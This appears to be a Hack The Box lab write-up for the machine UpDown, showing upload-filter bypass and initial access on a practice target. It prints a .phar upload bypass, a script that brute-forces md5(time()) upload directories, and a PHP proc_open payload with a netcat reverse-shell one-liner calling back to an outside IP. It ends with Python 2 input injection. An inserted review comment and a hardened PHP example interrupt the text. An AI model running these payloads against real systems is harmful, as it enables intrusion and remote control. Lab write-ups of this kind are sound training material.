CREATE & DESTROY


UpDown | Hack The Box

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 9e:1f:98:d7:c8:ba:61:db:f1:49:66:9d:70:17:02:e7 (RSA)
|   256 c2:1c:fe:11:52:e3:d7:e5:f7:59:18:6b:68:45:3f:62 (ECDSA)
|_  256 5f:6e:12:67:0a:66:e8:e2:b7:61:be:c4:14:3a:d3:8e (ED25519)
80/tcp open  http    Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Is my Website up ?
|_http-server-header: Apache/2.4.41 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

A common theme, not much to go off from the first scan. We’ll poke at the web app while we do an all ports scan.

We find a website checker, which does attempt to connect out – that’ll be something to dig into.

Debug mode also displays whatever is on the page; sadly it only displays the raw text and doesn’t render it through PHP.

After a lot of playing around, we find it is vulnerable to all kinds of XSS but not a lot else…

Back to enumeration and we find the subdomain dev.siteisup.htb which gives a 403 and http://siteisup.htb/dev/.git, so using wget we can download the folder and see what’s been added.

wget -r http://siteisup.htb/dev/.git

This seems to suggest that to access dev.siteisup.htb we need to set the Special-Dev: only4dev header.

Now we have access to the development version. Through the .git folder we’re also able to read the source code, and this version uploads a list of URLs for parsing.
# Check if extension is allowed.                                                                                                                                                                                                  
+       $ext = getExtension($file);                                                                                                                                                                                                       
+       if(preg_match("/php|php[0-9]|html|py|pl|phtml|zip|rar|gz|gzip|tar/i",$ext)){                                                                                                                                                      
+               die("Extension not allowed!");                                                                                                                                                                                            
+       }                                                                                                                                                                                                                                 
+                                                                                                                                                                                                                                         
+       # Create directory to upload our file.                                                                                                                                                                                            
+       $dir = "uploads/".md5(time())."/";                                                                                                                                                                                                
+       if(!is_dir($dir)){                                                                                                                                                                                                                
+        mkdir($dir, 0770, true);  
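Review bot: the extension check is a denylist on the filename alone, which is the wrong shape here; it stops php/phtml/html but lets through other names the PHP handler may still execute (the text below shows .phar doing exactly that), so replace it with an allowlist of the list formats the checker actually expects and inspect the content type, not just the name. The same hunk names the directory md5(time()), which is predictable to the second for anyone who knows roughly when the upload happened; name it from random_bytes() instead, and keep the uploads tree from being served as PHP, so a race against the post-parse cleanup has nothing to aim at.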

We know there are file upload filters, but we’re able to sneak a PHP file through with the .phar extension. Now we’ll just have to build a script to fuzz for the directory. Continuing with the code we can see that it uploads to this generated directory and deletes it after parsing, so we have to add a bunch of URLs to our list to delay things. Hopefully that gives us time to fuzz for our shell.
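A hardened version of that upload check, as an added example (not the application’s own code); it assumes the checker only ever needs plain-text lists and that the upload arrives as $_FILES['file']:

```php
<?php
// Added example: allowlist + unguessable directory, replacing the denylist
// and md5(time()) naming described above. Assumes plain-text lists only.

function safeExtension(string $name): ?string {
    // Allowlist of expected list formats (hypothetical set). Anything else,
    // including .phar, .phps or double extensions, is rejected outright.
    $allowed = ['txt', 'csv', 'lst'];
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    return in_array($ext, $allowed, true) ? $ext : null;
}

function uploadDir(string $base): string {
    // md5(time()) is guessable to the second; 128 bits from the CSPRNG is not.
    $dir = rtrim($base, '/') . '/' . bin2hex(random_bytes(16)) . '/';
    if (!is_dir($dir) && !mkdir($dir, 0770, true)) {
        throw new RuntimeException('could not create upload dir');
    }
    return $dir;
}

function storeUpload(array $file, string $base): string {
    if ($file['error'] !== UPLOAD_ERR_OK) {
        throw new RuntimeException('upload failed');
    }
    $ext = safeExtension($file['name']);
    if ($ext === null) {
        throw new RuntimeException('Extension not allowed!');
    }
    // Check the bytes, not the name: only plain text is accepted.
    $mime = (new finfo(FILEINFO_MIME_TYPE))->file($file['tmp_name']);
    if ($mime !== 'text/plain') {
        throw new RuntimeException('Only text lists are accepted');
    }
    // Server-chosen filename: the client's name never reaches the filesystem.
    $dest = uploadDir($base) . bin2hex(random_bytes(8)) . '.' . $ext;
    if (!move_uploaded_file($file['tmp_name'], $dest)) {
        throw new RuntimeException('could not store file');
    }
    return $dest;
}

// Usage (constructed): $base should live outside the web root, or have PHP
// execution disabled for it, so the parse-then-delete window cannot be raced.
// $path = storeUpload($_FILES['file'], __DIR__ . '/../uploads');
```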

import requests
import sys
import hashlib
import time

# The upload directory is named md5(time()), so walk the candidate
# timestamps around "now" and probe each one for our uploaded file.
t = int(time.time()) - 50
te = t + 1000
headers = {"Referer": "127.0.0.1", "Special-Dev": "only4dev"}

while t < te:
    t += 1
    d = hashlib.md5(str(t).encode('utf-8')).hexdigest()
    url = f"http://dev.siteisup.htb/uploads/{d}/shell.phar"
    response = requests.get(url, headers=headers)
    if response.status_code == 200:
        print("[+] Shell = " + url)
        sys.exit()

Unfortunately the standard PHP reverse shell doesn’t work. Uploading a phpinfo() file to inspect the configuration shows us why…

Most of the useful functions are blocked: fopen, exec, fsockopen etc. Working through lots of alternatives we eventually discover that proc_open is still available, and conveniently there’s a PHP shell used as an example at the bottom of the manual page: https://www.php.net/manual/en/function.proc-open.php

<?php
$descriptorspec = array(
   0 => array("pipe", "r"),
   1 => array("pipe", "w"),
   2 => array("file", "/tmp/be.txt", "a")
);

$cwd = '/tmp';
$env = array('some_option' => 'aeiou');
$process = proc_open('bash', $descriptorspec, $pipes, $cwd, $env);

if (is_resource($process)) {
    fwrite($pipes[0], 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 10.10.14.80 1234 >/tmp/f');
    fclose($pipes[0]);
    fclose($pipes[1]);

}
?>

We pad the start of the script with a bunch of URLs to delay things, run our script and…

Now for our user flag, we find two files inside /home/developer/dev: a Python file and a compiled binary of apparently the same script. It’s Python 2 and asks us for input.

The file is owned by the user developer, so if we can get code execution through it we can escalate to this user. Luckily the way Python 2 handles this input is vulnerable to simple code injection, so creating a simple Python reverse shell inside /tmp and executing it from the prompt pops us into the new user.

Welcome to 'siteisup.htb' application

Enter URL here:execfile('/tmp/shell.py')

We do also manage to grab some SSH keys so we don’t have to shuffle through gross shells anymore.

developer@updown:/dev/shm$ sudo -l
Matching Defaults entries for developer on localhost:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User developer may run the following commands on localhost:
    (ALL) NOPASSWD: /usr/local/bin/easy_install
